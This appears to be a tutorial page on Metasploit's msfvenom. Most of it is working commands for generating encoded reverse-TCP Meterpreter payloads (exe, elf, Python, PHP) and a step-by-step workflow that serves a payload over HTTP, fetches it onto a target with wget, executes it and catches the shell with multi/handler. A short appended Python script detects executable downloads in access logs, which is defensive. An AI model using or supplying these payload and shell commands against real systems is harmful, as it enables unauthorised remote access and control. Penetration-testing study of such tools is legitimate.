Msfvenom

Introduction

Msfvenom is the standalone command-line utility within the Metasploit Framework used to generate and encode custom payloads.

Basic usage syntax

msfvenom -p <payload> [options] -e <encoder> -i <iterations> -f <format> -o <output file>

  • -p: Specifies the payload to use.

  • [options]: Payload-specific options such as LHOST and LPORT.

  • -e: Specifies the encoder to use.

  • -i: Specifies the number of encoding iterations.

  • -f: Specifies the output format.

  • -o: Specifies the output file.

Commands

List all the msfvenom payloads

$ msfvenom -l payloads

List all the supported output formats

$ msfvenom -l formats

Generate a Reverse TCP Meterpreter payload for Windows

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o payload.exe

(This command generates a Windows executable file (payload.exe) containing a reverse TCP Meterpreter payload that connects back to the attacker's machine at 192.168.1.100 on port 4444)

Generate an encoded payload

$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f elf -o payload.elf

(This command generates a Linux ELF executable (payload.elf) containing a reverse TCP Meterpreter payload, encoded five times using the x86/shikata_ga_nai encoder)

Generate a Python script for a reverse shell

$ msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o payload.py

Generate PHP code for a reverse shell

$ msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o payload.php

(Note: You need to edit the generated payload.php file to turn it into a working PHP file by removing the comments and adding the closing tag)

Multi Handler

It is an msf module (exploit/multi/handler) that listens for and receives the incoming connections.

For using it, open up the msfconsole prompt using msfconsole command, then follow the given workflow:

msf6> use exploit/multi/handler
msf6> set payload php/meterpreter/reverse_php

(The payload must be the same one that was used to generate the msfvenom payload)

msf6> set lhost 192.168.0.100

(The lhost value should be the IP address for your local machine)

msf6> set lport 4444

(Set an unused port; it must be the same port that was used in the msfvenom payload)

msf6> run

Some payloads

Payload (-p)                         Format (-f)                                  Output file extension (-o)
php/meterpreter/reverse_php          raw                                          .php
python/meterpreter/reverse_tcp       raw                                          .py
linux/x86/meterpreter/reverse_tcp    elf (Linux Executable and Linkable Format)   .elf
windows/meterpreter/reverse_tcp      exe                                          .exe
cmd/unix/reverse_python              raw                                          .py
windows/meterpreter/reverse_tcp      asp                                          .asp
php/meterpreter_reverse_php          raw                                          .php

Note: You can find the payload you need by piping the payload list through grep (msfvenom -l payloads | grep <keyword>)

Example

Here is an example showcasing the basic workflow (we already have access to the target machine and want to create a reverse shell):

  1. First, connect to the target machine via ssh

$ ssh [username]@[target_ip]

  2. Create a payload for the reverse shell (on the local machine)

$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[local_machine_ip] LPORT=[port] -f elf > rev_shell.elf

  3. Then host it using Python's http.server module (on the local machine)

$ python3 -m http.server [port]

(Alternatively, you can use an Apache server on your local machine to host it)

  4. Download the created reverse shell file on the target machine (the file is served on the given port of your local machine)

$ wget http://[local_machine_ip]:[port]/rev_shell.elf

  5. Listen for the connection on your local machine using Multi Handler

msf6> use exploit/multi/handler
msf6> set payload linux/x86/meterpreter/reverse_tcp
msf6> set lhost [local_machine_ip]
msf6> set lport [port]
msf6> run

  6. Finally, run the .elf file on the target machine to open the Meterpreter session

$ ./rev_shell.elf

(You may need to give the rev_shell.elf file executable permission, as in: sudo chmod 777 rev_shell.elf. Note that chmod +x rev_shell.elf is sufficient; 777 grants more permissions than this needs)

Hence, you will have the Meterpreter session on your local machine, which was listening for connections using Multi Handler.
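Step 4 of this workflow leaves a trace that is useful from the defending side: the fetch of rev_shell.elf is an HTTP GET for a file with an executable extension, recorded by whatever web server or proxy sits in the path, and the downloaded file carries a known executable header regardless of what it is named. The script below is an added example, not code from the page or from Metasploit. It parses access-log lines in the format python's http.server prints (the sample lines are constructed), reports requests for executable-extension paths including failed attempts, and identifies a fetched file by its header.

```python
"""Spot executable fetches in HTTP access logs and identify what was fetched.

Added example, not code from the original page or from Metasploit. The
log lines below are constructed in the format that "python3 -m
http.server" prints for each request; any web server or proxy log with
client, path and status can be mapped onto the same check.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List

# python -m http.server logs one line per request, e.g.
# 192.168.1.50 - - [10/Jan/2024 12:00:01] "GET /rev_shell.elf HTTP/1.1" 200 -
LOG_RE = re.compile(
    r'^(?P<client>\S+) - - \[(?P<when>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3}) \S+$'
)

# Extensions of the binary artifacts the commands above generate (-f exe, -f elf).
EXECUTABLE_EXT = (".exe", ".elf")


@dataclass
class Finding:
    client: str
    when: str
    path: str
    status: int


def find_executable_fetches(lines: Iterable[str]) -> List[Finding]:
    """Return every request for an executable-extension path, regardless of
    status, so that failed attempts (404) are reported alongside successful
    downloads (200). Lines that do not match the log format are skipped."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        # Compare on the path only, ignoring any query string and case.
        path = m.group("path").split("?", 1)[0].lower()
        if path.endswith(EXECUTABLE_EXT):
            findings.append(Finding(m.group("client"), m.group("when"),
                                    m.group("path"), int(m.group("status"))))
    return findings


def classify_artifact(data: bytes) -> str:
    """Identify a fetched file by its header rather than its name:
    ELF files start with 0x7f 'ELF', Windows PE files with 'MZ'."""
    if data.startswith(b"\x7fELF"):
        return "elf"
    if data.startswith(b"MZ"):
        return "pe"
    return "unknown"


SAMPLE_LOG = [  # constructed sample lines
    '192.168.1.50 - - [10/Jan/2024 12:00:01] "GET /index.html HTTP/1.1" 200 -',
    '192.168.1.50 - - [10/Jan/2024 12:00:04] "GET /rev_shell.elf HTTP/1.1" 200 -',
    '192.168.1.77 - - [10/Jan/2024 12:01:12] "GET /payload.exe?x=1 HTTP/1.1" 404 -',
    'not a log line',
]

if __name__ == "__main__":
    for f in find_executable_fetches(SAMPLE_LOG):
        print(f"{f.client} requested {f.path} at {f.when} (HTTP {f.status})")
```

Extension matching only catches the naming used in this page's workflow, which is why classify_artifact checks the file header instead: an ELF renamed to something innocuous still begins with the same four bytes.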
